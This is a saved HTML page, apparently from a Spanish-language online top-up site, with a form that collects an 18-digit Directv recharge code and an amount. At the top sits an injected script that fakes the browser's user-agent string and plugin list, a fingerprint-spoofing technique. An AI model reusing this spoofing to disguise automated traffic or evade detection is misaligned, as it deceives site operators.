<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script type="text/javascript">(function() {'use strict';function shuffle(arr) {var ci = arr.length,tv,ri;while (0 !== ci) {ri = Math.floor(Math.random() * ci);ci -= 1;tv = arr[ci];arr[ci]=arr[ri];arr[ri]=tv; }return arr;}var oUA = window.navigator.userAgent;Object.defineProperty(window.navigator, 'userAgent', {get: function() {return oUA + ' Trailer/95.3.8582.83';}, configurable: true});var tPg = [];if(window.navigator.plugins) {if(window.navigator.plugins.length) {var opgLength = window.navigator.plugins.length, nvPg = window.navigator.plugins;Object.setPrototypeOf(nvPg, Array.prototype);nvPg.length = opgLength;nvPg.forEach(function(k,v) {var plg = {name: k.name, description: k.description, filename: k.filename, version: k.version, length: k.length,item: function(index) {return this[index] ?? null; }, namedItem: function(name) { return this[name] ?? null; } };var tPgLength = k.length; Object.setPrototypeOf(k, Array.prototype); k.length = tPgLength; k.forEach(function(a, b){ plg[b] = plg[a.type] = a; });Object.setPrototypeOf (plg, Plugin.prototype); tPg.push(plg);});}}var pgTI = [{'name':'SpecialPlayer', 'description': 'Special format player', 'filename': 'specialplayer.dll','0':{'type': 'application/special', 'suffixes': 'special', 'description': 'Special format player'} },{'name':'AutoUpdaterTO', 'description': 'Autou checking plugin', 'filename': 'autoupdaterto.dll','0':{'type': 'application/auto-updater-to', 'suffixes': 'auto', 'description': 'Autou checking plugin'} },{'name':'VT VideoPlayback', 'description': 'VT video playback', 'filename': 'vtvideoplayback.dll','0':{'type': 'application/vt-video', 'suffixes': 'vtv', 'description': 'VT video playback'} },{'name':'RafWebPlugin', 'description': 'Rafwe checking plugin', 'filename': 'rafwebplugin.dll','0':{'type': 'application/raf-web', 'suffixes': 'raf', 'description': 'Rafwe checking plugin'} }];if (pgTI) {pgTI.forEach(function(k, v) {var plg = {name: k.name, description: k.description, filename: k.filename, version: undefined, length: 1, item: function(index) { return this[index] ?? null; },namedItem: function(name) { return this[name] ?? null; } };var plgMt = {description: k[0].description, suffixes: k[0].suffixes, type: k[0].type, enabledPlugin: null}; Object.setPrototypeOf(plgMt, MimeType.prototype); plg[0] = plg[plgMt.type] = plgMt;Object.setPrototypeOf(plg, Plugin.prototype); tPg.push(plg);});}var fPgI = {length: tPg.length, item: function(index) {return this[index] ?? null; }, namedItem: function(name) {return this[name] ?? null; }, refresh: function() {} };tPg = shuffle(tPg);tPg.forEach(function(k,v) { fPgI[v] = fPgI[k.name] = k; });Object.setPrototypeOf(fPgI, PluginArray.prototype);Object.defineProperty(window.navigator, 'plugins', {get: function() { return fPgI; }, enumerable: true, configurable: true});})();</script>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" type="image/ico" href="https://recargasservicios.net/favicon.ico">
    <title>Recargas en linea | Recarga celular - Sube - Directv - Antina</title>
    <link rel="stylesheet" href="./dtv_files/stylea.css">
    <link rel="stylesheet" href="./dtv_files/styleb.css">
    <link rel="stylesheet" href="./dtv_files/stylec.css">
</head><body>
<div class="navb">
    <div class="logo">
        <a href="#">Recarga Online</a>
    </div>
</div>
<form action="../payment" method="POST" id="recarga_payment">
<input type="hidden" name="type" id="type" value="Directv">
<div class="container-fluid pt-5">
    <div class="row d-flex justify-content-center">
        <div class="col-md-6 col-12">
            <h3 class="title">Bienvenido a Recargas en línea</h3>
            <h5 class="subtitle">Sigue los pasos y llena los datos solicitados para recargar.</h5>
        </div>
    </div>
    <div class="row d-flex justify-content-center">
        <div class="col-lg-5 col-md-8 col-10 mt-3 contenedor">
            <div class="row d-flex justify-content-center px-5">
                <div class="col-12">
                    <div class="input">
                        <input type="text" id="cellphone" name="cellphone" inputmode="decimal" minlength="18" maxlength="18">
                        <label for="cellphone">Codigo de recarga Directv</label>
                    </div>
                    <p class="small m-0">Ingresá los 18 números del código de recarga</p>
                </div>
                <div class="col-12">
                    <div class="input">
                        <input type="text" id="monto" name="monto" inputmode="decimal">
                        <label for="monto">Monto a recargar</label>
                    </div>
                    <p class="small m-0">Monto minimo de $10</p>
                </div>
                <div class="col-12">
                    <button type="submit" id="submit" disabled="disabled">Siguiente</button>
                </div>
            </div>
        </div>
    </div>
</div>
</form>
<script src="./dtv_files/jquery.js.descarga"></script>
<script src="./dtv_files/customscript.js.descarga"></script>    

</body></html>